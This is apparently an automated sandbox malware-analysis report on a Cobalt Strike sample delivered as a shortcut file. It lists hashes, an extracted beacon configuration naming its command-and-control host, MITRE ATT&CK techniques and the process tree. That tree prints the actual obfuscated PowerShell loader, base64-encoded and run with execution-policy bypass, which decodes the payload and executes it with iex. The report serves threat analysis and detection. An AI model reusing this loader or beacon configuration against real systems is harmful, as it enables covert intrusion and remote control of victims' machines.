cobaltstrike | e2945268c976f8dc33ba9a8d1a804f00cff46aabc01cd3196651322a71863b87

Analysis

max time kernel
80s
max time network
140s
platform
windows10_x64
resource
win10v20201028
submitted
26-12-2020 20:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ds7002.lnk
Size

392KB
MD5

6ed0020b0851fb71d5b0076f4ee95f3c
SHA1

e431261c63f94a174a1308defccc674dabbe3609
SHA256

2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
SHA512

2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3

Score

10^/10

cobaltstrike backdoor trojan

Malware Config

Extracted

Family

cobaltstrike

http://pandorasong.com:443/access/

Attributes

access_type
512
beacon_type
2048
create_remote_thread
0
day
0
dns_idle
0
dns_sleep
0
host
pandorasong.com,/access/
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAeR2V0Q29udGVudEZlYXR1cmVzLkRMTkEuT1JHOiAxAAAACgAAABVIb3N0OiBwYW5kb3Jhc29uZy5jb20AAAAKAAAASENvb2tpZTogIF9fdXRtYT0zMTAwNjY3MzMuMjg4NDUzNDQ0MC4xNDMzMjAxNDYyLjE0MDMyMDQzNzIuMTM4NTIwMjQ5OC43OwAAAAkAAAAJdmVyc2lvbj00AAAACQAAAA5saWQ9MTU4MjUwMjcyNAAAAAcAAAAAAAAACAAAAAUAAAAFdG9rZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFUhvc3Q6IHBhbmRvcmFzb25nLmNvbQAAAAcAAAAAAAAABQAAAANyaWQAAAAJAAAADmxpZD0xNjgzNTAzNzM1AAAACQAAAB9tZXRob2Q9Z2V0U2VhcmNoUmVjb21tZW5kYXRpb25zAAAABwAAAAEAAAADAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_method1
GET
http_method2
POST
injection_process
jitter
4352
maxdns
255
month
0
pipe_name
\\%s\pipe\msagent_%x
polling_time
300000
port_number
443
proxy_password
proxy_server
proxy_username
sc_process32
%windir%\syswow64\rundll32.exe
sc_process64
%windir%\sysnative\rundll32.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN7UFLcBHjvme4lLXoOKMyNrF46j4Xi87J4ilrNPDQxLOq2KHaCXP+0FsWYs7JFqLXGmqOIfALpPLIyGgnRuC60ZXaSKmCENE2O88Z0BxDkRxSaKEbgv3ETo/Ra7cF8JNr3szy0sNBVyi9dhS2WhXRIU923X2ZQxbpSyUNi5Q//wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
7.382016e+08
unknown2
AAAABAAAAAIAAAAQAAAAAgAAABAAAAACAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown3
0
unknown4
0
unknown5
2.350256387e+09
uri
/radio/xmlrpc/v45
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
year
0

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

11 3280 rundll32.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3280 rundll32.exe

flow	pid	process
11	3280	rundll32.exe

pid	process
3280	rundll32.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

powershell.exeAcroRd32.exe

pid	process
3712	powershell.exe
3712	powershell.exe
3712	powershell.exe
3712	powershell.exe
3712	powershell.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3712 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

3224 AcroRd32.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

AcroRd32.exe

pid process

3224 AcroRd32.exe
3224 AcroRd32.exe
3224 AcroRd32.exe
3224 AcroRd32.exe
3224 AcroRd32.exe
3224 AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	3712	powershell.exe

pid	process
3224	AcroRd32.exe

pid	process
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe
3224	AcroRd32.exe

Suspicious use of WriteProcessMemory 268 IoCs

Processes:

cmd.exepowershell.execsc.execsc.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 1192 wrote to memory of 3712	1192	cmd.exe	powershell.exe
PID 1192 wrote to memory of 3712	1192	cmd.exe	powershell.exe
PID 3712 wrote to memory of 864	3712	powershell.exe	csc.exe
PID 3712 wrote to memory of 864	3712	powershell.exe	csc.exe
PID 864 wrote to memory of 504	864	csc.exe	cvtres.exe
PID 864 wrote to memory of 504	864	csc.exe	cvtres.exe
PID 3712 wrote to memory of 2912	3712	powershell.exe	csc.exe
PID 3712 wrote to memory of 2912	3712	powershell.exe	csc.exe
PID 2912 wrote to memory of 1452	2912	csc.exe	cvtres.exe
PID 2912 wrote to memory of 1452	2912	csc.exe	cvtres.exe
PID 3712 wrote to memory of 3224	3712	powershell.exe	AcroRd32.exe
PID 3712 wrote to memory of 3224	3712	powershell.exe	AcroRd32.exe
PID 3712 wrote to memory of 3224	3712	powershell.exe	AcroRd32.exe
PID 3712 wrote to memory of 3280	3712	powershell.exe	rundll32.exe
PID 3712 wrote to memory of 3280	3712	powershell.exe	rundll32.exe
PID 3224 wrote to memory of 864	3224	AcroRd32.exe	RdrCEF.exe
PID 3224 wrote to memory of 864	3224	AcroRd32.exe	RdrCEF.exe
PID 3224 wrote to memory of 864	3224	AcroRd32.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 2820	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 720	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 720	864	RdrCEF.exe	RdrCEF.exe
PID 864 wrote to memory of 720	864	RdrCEF.exe	RdrCEF.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\ds7002.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJEVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUpO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2enZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZCgkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFycmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3712

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4qgwvi1q\4qgwvi1q.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6BEE.tmp" "c:\Users\Admin\AppData\Local\Temp\4qgwvi1q\CSC5A2DD784BD9D45A98611C5537A8A7859.TMP"
4⤵
PID:504

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zop2j04m\zop2j04m.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2912

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6DA4.tmp" "c:\Users\Admin\AppData\Local\Temp\zop2j04m\CSC1CF7842663148D6AD4940A97A63AE11.TMP"
4⤵
PID:1452

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ds7002.PDF"
3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3224

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
- Suspicious use of WriteProcessMemory
PID:864

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=47DAFD1037BFF6814912688784990307 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=47DAFD1037BFF6814912688784990307 --renderer-client-id=2 --mojo-platform-channel-handle=1632 --allow-no-sandbox-job /prefetch:1
5⤵
PID:2820

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=62CC0C764F90EE5DD0B5128877C4F9B0 --mojo-platform-channel-handle=1640 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:720

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=FA72FAA5A5B5CBE943BCE6F0E789EA20 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=FA72FAA5A5B5CBE943BCE6F0E789EA20 --renderer-client-id=4 --mojo-platform-channel-handle=2088 --allow-no-sandbox-job /prefetch:1
5⤵
PID:3804

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7E5C290B08D1BA219AE472F5319370FD --mojo-platform-channel-handle=2484 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:3948

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CF73B682716656EE8F17D52C0930EFC5 --mojo-platform-channel-handle=2080 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:504

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DF60E2F47A1AAA115DE27723D1655990 --mojo-platform-channel-handle=2564 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:2004

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\cyzfc.dat, PointFunctionCall
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:3280

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4qgwvi1q\4qgwvi1q.dll
MD5
3a216209910162c6c313f5e39c72ab72

SHA1
13a813d2d658ba8ead3ace67197bc7b396724cd8

SHA256
63ec074483787e76ccf864f8e9606ba54050287906d77301c84a28cd9270fc7c

SHA512
c6af206d2807230e9de74f5b69574dd1f77d44e604f8d96f007ebe6b079e077ecc8f57fa8046d240e16ba2b29cd55e397aa3beb5fad3d5b6b476183e413d1b42

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6BEE.tmp
MD5
8ea2811a92592f13205304d3f47136e0

SHA1
2e5aa2ef235f99848e29f310955844c55f1f7ae4

SHA256
ce581893d475bbad2aed1cc7f7fa4431e94192f7540f2f1f89b57c57d43469e7

SHA512
f2c00025b083311a7d8e3b13be0b0cfbbe801cd78e2e1ac924bacb11b93070422c77976902f47fa30d8242cccc6a765917ed81161c0997e3bdb1b8bafc11f088

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6DA4.tmp
MD5
c604c113370c146557a6b96a525f8f71

SHA1
fded3d2e1dc4301a97ee816166d55e64d139076d

SHA256
28536c853cf14a0029abc584d4159e66e0e499efd64a3b45eb0c6816b8be41a2

SHA512
b188f38531d19fa01506590b7043409b2efd003fabad242ead3821bfe1dc07931ee7fc663c7ae2414db48cb6f8e541e62f4d2c4b0344c99ae36d6ecfb0d66906

Download Submit
C:\Users\Admin\AppData\Local\Temp\ds7002.PDF
MD5
313f4808aa2a2073005d219bc68971cd

SHA1
053fb60530e884851eb8b6aebbec4570ec788d4a

SHA256
b1c811d3f0e930b0096a9e785f730ba4d92458bd6dcfbdff4cf7a1e247ef20d1

SHA512
1d983f3c659eb3dfac3fe280e7cb3c6e25264752c11ff7d2ab232ffbf30b659a3d61bdf3773ec32caa09de716a3c439dea0d77dab5cb9e07d0e6ec43a0b1a68d

Download Submit
C:\Users\Admin\AppData\Local\Temp\zop2j04m\zop2j04m.dll
MD5
d9fac1cadeb75f7a736ab19e574a6770

SHA1
7736b0605a5ecf3e0820da31871f9677b16cfdb7

SHA256
deb20509a1bba2bcd374c95774c2600520abe15ab0b56c706c83631025fe11fe

SHA512
c2aa0ab77a9fb02b7d335d56dbac4042817b2e5167ed007dc4528189aa1ca09be5997c7c1fe9ae8be8642fa506ef8dad65b07e1d23bc9423289d8231421a0980

Download Submit
C:\Users\Admin\AppData\Local\cyzfc.dat
MD5
16bbc967a8b6a365871a05c74a4f345b

SHA1
9858d5cb2a6614be3c48e33911bf9f7978b441bf

SHA256
b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05

SHA512
68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4qgwvi1q\4qgwvi1q.0.cs
MD5
cdcb629e6587254315606a6ba3764745

SHA1
d5b706ca48b7af8926926e80565148f725c75393

SHA256
3c131fcda0193278274e4ae82bf8363e17fcc0d1110d486072061549e0b0db55

SHA512
29f17e62d18c716445e09f10dfcae7e5eef72ce0a64a3a9bd8e30108beabe55029f4b70ed5f4926772c791e7fb688b7f2d0ff777641bd86c79421189b7a8cadc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4qgwvi1q\4qgwvi1q.cmdline
MD5
54acfa68a7d3b92bc7a9cf902a677226

SHA1
13c6b985e804ae204c6d12408e626113b7e8ca14

SHA256
